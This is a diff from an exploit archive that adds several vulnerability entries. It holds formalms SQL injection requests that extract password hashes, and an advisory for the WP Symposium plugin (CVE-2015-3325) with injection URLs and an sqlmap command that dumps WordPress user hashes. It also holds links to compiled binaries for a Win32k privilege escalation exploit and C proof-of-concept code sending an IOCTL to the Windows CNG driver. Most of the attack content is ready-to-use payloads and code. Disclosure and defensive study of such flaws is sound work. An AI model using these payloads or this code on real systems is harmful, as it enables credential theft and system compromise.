+	POST /formalms/appLms/index.php?modname=coursereport&op=addscorm HTTP/1.1 Host: localhost
+	Cookie: docebo_session=a6c94fcdfecf0d08b83de03a3c576885
+
+	authentic_request=e1d3c5667856f21f0d09ce4796a76da6&id_report=0&source_of=scoitem&title=null+union+select+pass+fr om+core_user+where+idst=11836+&filtra=Salva+modifiche
+	-------------------------
+
+
+	[!] lib.message.php Blind Time-Based SQL Injection in msg_course_filter param
+	-------------------------
+	POST /formalms/appLms/index.php?modname=message&op=writemessage HTTP/1.1 Host: localhost
+	Cookie: docebo_session=0c0491bb1fa6d814752d9e59c066df60
+
+	[...] 
+
+	------WebKitFormBoundaryu0DCt6tLZt8hAdlH
+	Content-Disposition: form-data; name="msg_course_filter"
+
+	99999 union SELECT IF(SUBSTRING(pass,1,1) = char(100),benchmark(5000000,encode(1,2)),null) from core_user
+	where idst=11836
+
+	[...]
+	------------------------
+
+
+	[!] coursereport.php SQL Injection in id_source param
+	-------------------------
+	POST /formalms/appLms/index.php?modname=coursereport&op=addscorm HTTP/1.1
+	Host: localhost
+	Cookie: docebo_session=a6c94fcdfecf0d08b83de03a3c576885; SQLiteManager_currentLangue=2
+
+	authentic_request=e1d3c5667856f21f0d09ce4796a76da6&id_report=0&weight=123&show_to_user=true&use_for_final=true&tit le=&source_of=scoitem&titolo=&id_source=null+union+select+null,null,null,null,null,null,null,null,null,null,null,null,null,p ass,null,null,null+from+core_user+where+idst=11836&save=Salva+modifiche
+	-------------------------
+
+
+For further details and explanations check the full advisory.
+
+
+[+] Disclaimer
+Permission is hereby granted for the redistribution of this alert, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author.	

platforms/php/webapps/37080.txt

@@ -0,0 +1,112 @@
+=======================================================================
+
+              title: SQL Injection
+            product: WordPress WP Symposium Plugin
+ vulnerable version: 15.1 (and probably below)
+      fixed version: 15.4
+         CVE number: CVE-2015-3325
+             impact: CVSS Base Score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
+           homepage: https://wordpress.org/plugins/wp-symposium/
+              found: 2015-02-07
+                 by: Hannes Trunde
+                     
+               mail: hannes.trunde@gmail.com
+            twitter: @hannestrunde
+
+=======================================================================
+
+
+Plugin description:
+-------------------
+"WP Symposium turns a WordPress website into a Social Network! It is a WordPress
+plugin that provides a forum, activity (similar to Facebook wall), member 
+directory, private mail, notification panel, chat windows, profile page, social 
+widgets, activity alerts, RSS activity feeds, Groups, Events, Gallery, Facebook 
+Connect and Mobile support! You simply choose which you want to activate! 
+Certain features are optional to members to protect their privacy."
+
+Source: https://wordpress.org/plugins/wp-symposium/
+
+
+Recommendation:
+---------------
+The author has provided a fixed plugin version which should be installed 
+immediately.
+
+
+Vulnerability overview/description:
+-----------------------------------
+Because of insufficient input validation, a blind sql injection attack can be
+performed within the forum feature to obtain sensitive information from the 
+database. The vulnerable code sections are described below.
+
+forum.php lines 59-62:
+===============================================================================
+if ( ( $topic_id == '' && $cat_id == '') || ( !$cat_id != '' && get_option(WPS_OPTIONS_PREFIX.'_forum_ajax') && !get_option(WPS_OPTIONS_PREFIX.'_permalink_structure') ) ) {
+   $cat_id = isset($_GET['cid']) ? $_GET['cid'] : 0;
+   $topic_id = isset($_GET['show']) ? $_GET['show'] : 0;  // GET PARAMETER IS ASSIGNED TO $topic_id VARIABLE
+}
+===============================================================================
+
+forum.php lines 95-103:
+===============================================================================
+if ( get_option(WPS_OPTIONS_PREFIX.'_permalink_structure') || !get_option(WPS_OPTIONS_PREFIX.'_forum_ajax') ) {
+   if ($topic_id == 0) {
+      $forum = __wps__getForum($cat_id);
+      if (($x = strpos($forum, '[|]')) !== FALSE) $forum = substr($forum, $x+3);
+      $html .= $forum;
+   } else {
+      $html .= __wps__getTopic($topic_id);	// __wps__getTopic IS CALLED WITH $topic_id AS PARAMETER
+   }
+}
+===============================================================================
+
+functions.php lines 152-155:
+===============================================================================
+$post = $wpdb->get_row("
+   SELECT tid, topic_subject, topic_approved, topic_category, topic_post, topic_started, display_name, topic_sticky, topic_owner, for_info 
+   FROM ".$wpdb->prefix."symposium_topics t INNER JOIN ".$wpdb->base_prefix."users u ON t.topic_owner = u.ID 
+   WHERE (t.topic_approved = 'on' OR t.topic_owner = ".$current_user->ID.") AND tid = ".$topic_id);   //UNVALIDATED $topic_id IS USED IN SQL QUERY
+===============================================================================
+
+
+Proof of concept:
+-----------------
+The following HTTP request to the forum page returns the topic with id 1:
+===============================================================================
+http://www.site.com/?page_id=4&cid=1&show=1 AND 1=1
+===============================================================================
+
+The following HTTP request to the forum page returns a blank page, thus 
+confirming the blind SQL injection vulnerability:
+===============================================================================
+http://www.site.com/?page_id=4&cid=1&show=1 AND 1=0
+===============================================================================
+
+Obtaining users and password hashes with sqlmap may look as follows:
+================================================================================
+sqlmap -u "http://www.site.com/?page_id=4&cid=1&show=1" -p "show" --technique=B --dbms=mysql --sql-query="select user_login,user_pass from wp_users"
+================================================================================
+
+
+Contact timeline:
+------------------------
+2015-04-08: Contacting author via mail.
+2015-04-13: Mail from author, confirming the vulnerability.
+2015-04-14: Requesting CVE via post to the open source software security mailing 
+            list: http://openwall.com/lists/oss-security/2015/04/14/5
+2015-04-15: Mail from author, stating that updated plugin version will be 
+            available in the next few days.
+2015-05-05: Mail from author, stating that fixed version has been uploaded and
+            should be available soon.
+2015-05-07: Confirming that update is available, releasing security advisory
+            
+
+Solution:
+---------
+Update to the most recent plugin version.
+
+
+Workaround:
+-----------
+See solution.

platforms/windows/local/37049.txt

@@ -0,0 +1,23 @@
+# Source: https://github.com/hfiref0x/CVE-2015-1701
+
+Win32k LPE vulnerability used in APT attack
+
+Original info: https://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html
+
+Credits
+R136a1 / hfiref0x
+
+
+
+## Compiled EXE:
+### x86
++ https://github.com/hfiref0x/CVE-2015-1701/raw/master/Compiled/Taihou32.exe
++ EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37049-32.exe
+### x64 
++ https://github.com/hfiref0x/CVE-2015-1701/raw/master/Compiled/Taihou64.exe
++ EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37049-64.exe
+
+Source Code: 
+https://github.com/hfiref0x/CVE-2015-1701/archive/master.zip
+EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37049-src.zip
+

platforms/windows/local/37052.c

@@ -0,0 +1,62 @@
+// Source: http://www.binvul.com/viewthread.php?tid=508
+// Source: https://twitter.com/NTarakanov/status/598370525132423168
+
+
+#include <windows.h>
+#include <winternl.h>
+#include <stdio.h>
+#pragma  comment(lib, "ntdll.lib")
+
+
+
+int main(int argc, CHAR* argv[]) {
+        typedef NTSTATUS  (__stdcall *NT_OPEN_FILE)(OUT PHANDLE FileHandle, IN ACCESS_MASK DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes, OUT PIO_STATUS_BLOCK IoStatusBlock, IN ULONG ShareAccess, IN ULONG OpenOptions);
+        NT_OPEN_FILE NtOpenFileStruct;
+
+        PVOID Info;
+        HMODULE hModule = LoadLibrary(("ntdll.dll"));
+        NtOpenFileStruct = (NT_OPEN_FILE)GetProcAddress(hModule, "NtOpenFile");
+        if(NtOpenFileStruct == NULL) {
+                exit(-1);
+        }
+        
+
+
+        UNICODE_STRING filename;
+        RtlInitUnicodeString(&filename, L"\\Device\\CNG");
+
+        
+        OBJECT_ATTRIBUTES obja;
+        obja.Attributes        =        0x40;
+        obja.ObjectName =   &filename;
+        obja.Length                =        0x18;
+        obja.RootDirectory        =        NULL;
+        obja.SecurityDescriptor        =        NULL;
+        obja.SecurityQualityOfService        =        NULL;
+        
+        IO_STATUS_BLOCK iostatusblock;
+        HANDLE hCNG   = NULL;
+        NTSTATUS stat = NtOpenFileStruct(&hCNG, 0x100001, &obja, &iostatusblock, 7, 0x20);
+        if(NT_SUCCESS(stat)) {
+                printf("File successfully opened.\n");
+        }
+        else {
+                printf("File could not be opened.\n");
+                return -1;
+        }
+        DWORD dwBuffer = 0;
+        DWORD dwCnt           = 0;
+        BOOL  bRet = DeviceIoControl((HANDLE)hCNG, 0x390048, &dwBuffer, 4, &dwBuffer, 4, &dwCnt, NULL);
+        if (FALSE == bRet)
+        {
+                printf("[*]Send IOCTL fail!\n");
+                printf("[*]Error Code:%d\n", GetLastError());
+        }
+        else
+        {
+                printf("[*]0x%08x\n", dwBuffer);        
+        }
+        CloseHandle(hCNG);
+        getchar();
+        return 0;
+}